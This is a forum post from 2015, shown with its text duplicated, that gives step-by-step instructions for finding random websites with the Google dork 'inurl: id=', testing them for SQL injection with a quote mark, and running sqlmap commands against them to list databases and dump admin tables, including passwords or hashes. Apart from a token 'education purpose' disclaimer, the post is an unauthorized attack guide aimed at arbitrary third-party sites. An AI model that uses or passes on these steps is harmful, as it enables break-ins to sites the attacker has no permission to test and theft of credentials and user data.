05-25-2015, 11:43 AM
HACK WEBSITE USING SQL
NOTE : THIS TUTORIAL ONLY FOR EDUCATION PURPOSE.
OS requirement:
windows xp and above
Software requirements :
* python : https://www.python.org/downloads/windows/
* sqlmap : http://sqlmap.org/
* download link for google dork : http://www.4shared.com/office/iBpu5coIba/dork.html
download and install them properly
first using google dork we gonna find out vulnerable websites
google dork :- inurl: id=
type this on google search and hit enter
choose one of the result and open it
after that go to the url and add '
if the website is vulnerable then it show some error
now open command promot
and go to the sqlmap directory on your computer
and type
python sqlmap.py -u www.victim.com --dbs
after getting the databasename, type
python sqlmap.py -u www.victim.com -D databasename --tables
it show you tablenames under the databasename
now you can dump the data as like either table or columnwise
fordump the entire table type:
python sqlmap.py -u www.victim.com -D databasename -T tablename --dump
or
shows columns under the table type :
python sqlmap.py -u www.victim.com -D databasename -T tablename --columns
dump the column of the table type:
python sqlmap.py -u www.victim.com -D databasename -T tablename -C columnname --dump
find admin table among them and dump the data
if you are fortunate enough then you get plain password
otherwise you got passhashes .
By
Dahiya hacker(tricks duniya)
NOTE : THIS TUTORIAL ONLY FOR EDUCATION PURPOSE.
OS requirement:
windows xp and above
Software requirements :
* python : https://www.python.org/downloads/windows/
* sqlmap : http://sqlmap.org/
* download link for google dork : http://www.4shared.com/office/iBpu5coIba/dork.html
download and install them properly
first using google dork we gonna find out vulnerable websites
google dork :- inurl: id=
type this on google search and hit enter
choose one of the result and open it
after that go to the url and add '
if the website is vulnerable then it show some error
now open command promot
and go to the sqlmap directory on your computer
and type
python sqlmap.py -u www.victim.com --dbs
after getting the databasename, type
python sqlmap.py -u www.victim.com -D databasename --tables
it show you tablenames under the databasename
now you can dump the data as like either table or columnwise
fordump the entire table type:
python sqlmap.py -u www.victim.com -D databasename -T tablename --dump
or
shows columns under the table type :
python sqlmap.py -u www.victim.com -D databasename -T tablename --columns
dump the column of the table type:
python sqlmap.py -u www.victim.com -D databasename -T tablename -C columnname --dump
find admin table among them and dump the data
if you are fortunate enough then you get plain password
otherwise you got passhashes .
By
Dahiya hacker(tricks duniya)